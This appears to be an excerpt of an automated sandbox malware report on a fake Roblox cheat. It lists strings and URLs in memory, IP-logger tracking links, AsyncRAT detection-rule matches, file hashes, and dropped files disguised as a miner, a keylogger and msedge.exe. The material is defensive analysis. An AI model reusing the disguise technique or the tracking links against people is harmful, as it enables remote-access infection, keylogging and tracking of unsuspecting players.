            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506659428.0000000002623000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506808610.0000000002628000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506475216.00000000025FF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506725819.0000000002625000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516791173.000000000262D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507963440.000000000262D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507432352.000000000260D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506475216.00000000025FF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506685606.000000000260C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508164365.000000000260F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
            Source: RobloxPlayerInstaller.exe, 00000004.00000002.1516960770.0000000004790000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
            Source: RobloxPlayerInstaller.exe, 00000004.00000002.1516960770.0000000004790000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1509281680.00000000047B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517091060.00000000047B6000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509159312.00000000047AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509602105.00000000047B5000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508502616.00000000047A8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508219364.0000000004796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: RobloxPlayerInstaller.exe, 00000004.00000002.1517423133.00000000047EF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508725092.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507185996.00000000047E0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.00000000047BE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510424442.00000000047EF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507823321.00000000047EE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508219364.0000000004796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508619596.00000000025FB000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506523382.00000000025E2000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507700641.00000000025FA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516653504.00000000025FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506523382.00000000025E2000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516688620.00000000025FD000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507700641.00000000025FA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507934077.00000000025FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510324009.000000000256B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509773967.0000000002568000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516235530.000000000256B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.roblox.com
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510324009.000000000256B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509773967.0000000002568000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516235530.000000000256B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.roblox.com/
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://www.winimage.com/zLibDll
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://www.winimage.com/zLibDll1.2.11rbr
            Source: chromecache_71.10.drString found in binary or memory: https://2no.co/
            Source: coin.bat.0.drString found in binary or memory: https://2no.co/24RXx6
            Source: chromecache_71.10.drString found in binary or memory: https://2no.co/redirect-2
            Source: chromecache_71.10.drString found in binary or memory: https://cdn.iplogger.org/favicon.ico
            Source: chromecache_71.10.drString found in binary or memory: https://cdn.iplogger.org/redirect/brand.png
            Source: chromecache_71.10.drString found in binary or memory: https://cdn.iplogger.org/redirect/handshake.png
            Source: chromecache_71.10.drString found in binary or memory: https://cdn.iplogger.org/redirect/logo-dark.png
            Source: RobloxPlayerInstaller.exe, 00000004.00000002.1516235530.000000000256B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller_9F112.log.4.dr, RobloxPlayerInstaller.exe.0.drString found in binary or memory: https://client-telemetry.roblox.com
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: https://client-telemetry.roblox.comHttpPointsReporterUrlBootstrapperWebView2InstallationTelemetryHun
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510324009.000000000256B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509773967.0000000002568000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516235530.000000000256B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-telemetry.roblox.comata
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1506844085.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510054438.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509329168.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517573174.0000000004827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-telemetry.roblox.come
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510324009.000000000256B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509773967.0000000002568000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516235530.000000000256B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-telemetry.roblox.cominatorey
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1506844085.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510054438.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509329168.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517573174.0000000004827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-telemetry.roblox.comogs
            Source: RobloxPlayerInstaller_9F112.log.4.drString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1506844085.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510054438.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509329168.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517573174.0000000004827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer(
            Source: RobloxPlayerInstaller.exe, 00000004.00000002.1516990822.000000000479D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508776431.000000000479D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508219364.0000000004796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer0
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1506844085.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510054438.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509329168.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517573174.0000000004827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerLMEMH
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1506844085.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510054438.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509329168.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517573174.0000000004827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerP
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1506844085.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510054438.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509329168.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517573174.0000000004827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerX
            Source: RobloxPlayerInstaller.exe, 00000004.00000002.1516990822.000000000479D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508776431.000000000479D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508219364.0000000004796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsStudio64
            Source: RobloxPlayerInstaller_9F112.log.4.drString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper
            Source: RobloxPlayerInstaller_9F112.log.4.drString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper.
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1506844085.00000000047F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperads
            Source: RobloxPlayerInstaller.exe, 00000004.00000002.1517491839.00000000047FB000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.00000000047BE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506844085.00000000047F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperate
            Source: RobloxPlayerInstaller.exe, 00000004.00000002.1517491839.00000000047FB000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.00000000047BE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506844085.00000000047F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperwnloads
            Source: chromecache_71.10.drString found in binary or memory: https://counter.yadro.ru/hit?
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: https://curl.se/docs/alt-svc.html
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: https://curl.se/docs/hsts.html
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: https://curl.se/docs/http-cookies.html
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516172847.000000000255F000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509897327.000000000255D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.dr String found in binary or memory: https://ecsv2.roblox.com/client/pbe
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.dr String found in binary or memory: https://ecsv2.roblox.com/client/pbeTelemetryV2UrlRobloxTelemetrySendByBatchSizeRobloxTelemetryBatchS
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516172847.000000000255F000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509897327.000000000255D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ecsv2.roblox.com/client/pbees
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1512774662.0000000001F43000.00000002.00000001.01000000.00000009.sdmp, cacert.pem.4.dr, RobloxPlayerInstaller.exe.0.dr String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/raw-file/default/security/nss/lib/ckfw/builtins/cert
            Source: chromecache_71.10.dr String found in binary or memory: https://iplogger.org/
            Source: chromecache_71.10.dr String found in binary or memory: https://iplogger.org/preview/7c00c9b3d049350da3aca75cf5f83229
            Source: chromecache_71.10.dr String found in binary or memory: https://iplogger.org/privacy/
            Source: chromecache_71.10.dr String found in binary or memory: https://iplogger.org/rules/
            Source: RobloxPlayerInstaller.exe.0.dr String found in binary or memory: https://s3.amazonaws.com/
            Source: RobloxPlayerInstaller.exe.0.dr String found in binary or memory: https://setup.rbxcdn.com
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1509281680.00000000047B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517091060.00000000047B6000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509159312.00000000047AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509602105.00000000047B5000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508502616.00000000047A8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508219364.0000000004796000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wwww.certigna.fr/autorites/
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1508083550.00000000047C3000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.00000000047BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wwww.certigna.fr/autorites/0m
            Source: unknown HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.9:49732 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.9:49745 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.9:49747 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 20.3.187.198:443 -> 192.168.2.9:61119 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.9:61121 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.9:61122 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.9:61123 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: BitCoin_miner.exe.0.dr, XLogger.cs .Net Code: KeyboardLayout
            Source: msedge.exe.0.dr, XLogger.cs .Net Code: KeyboardLayout

            System Summary

            Source: 00000000.00000003.1322026963.000001A0A6B7F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\Desktop\cheat_roblox.exe Code function: 0_2_00007FF6E7E1C2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6E7E1C2F0
            Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\ msedge.exe E85AF6A36635490B2FC2793B50C7EBC841DA95BC202A5FC9E7A4DBB17F172A2B
            Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe 79750B0F34A49A75406A0D7D6949AFD83DF2B2FF946E35A94AEA6BFE1D399599
            Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Keyloger.exe 8BC3BD8F0FF442D3C83DA8ED7DE13C8E44D095823E2480465BE866C08F7E8700
            Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe 3B8FCD52686095049B1563FBB6BA0BF73113A01B13C303BEBCB36D8339A1519F
            Source: cheat_roblox.exe, 00000000.00000003.1322026963.000001A0A6B7F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameXClient.exe4 vs cheat_roblox.exe
            Source: cheat_roblox.exe, 00000000.00000003.1322026963.000001A0A6B7F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameX.exe4 vs cheat_roblox.exe
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRoblox.exeH vs cheat_roblox.exe
            Source: 00000000.00000003.1322026963.000001A0A6B7F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: BitCoin_miner.exe.0.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
            Source: BitCoin_miner.exe.0.dr, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
            Source: Keyloger.exe.0.dr, tMXwX3tWlMuOZgJ.cs Cryptographic APIs: 'TransformFinalBlock'
            Source: Keyloger.exe.0.dr, dtVFTVK0Ux3SN1R.cs Cryptographic APIs: 'TransformFinalBlock'
            Source: msedge.exe.0.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
            Source: msedge.exe.0.dr, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
            Source: msedge.exe.0.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: msedge.exe.0.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: Keyloger.exe.0.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Keyloger.exe.0.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: BitCoin_miner.exe.0.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: BitCoin_miner.exe.0.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine Classification label: mal56.troj.spyw.evad.winEXE@24/21@20/14
            Source: C:\Users\user\Desktop\cheat_roblox.exe Code function: 0_2_00007FF6E7E1B6D8 GetLastError,FormatMessageW,LocalFree,0_2_00007FF6E7E1B6D8
            Source: C:\Users\user\Desktop\cheat_roblox.exe Code function: 0_2_00007FF6E7E38624 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00007FF6E7E38624
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe File created: C:\Program Files (x86)\Roblox
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe File created: C:\Users\user\AppData\Local\Roblox
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
            Source: C:\Users\user\Desktop\cheat_roblox.exe File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_4795703
            Source: cheat_roblox.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\cheat_roblox.exe File read: C:\Windows\win.ini
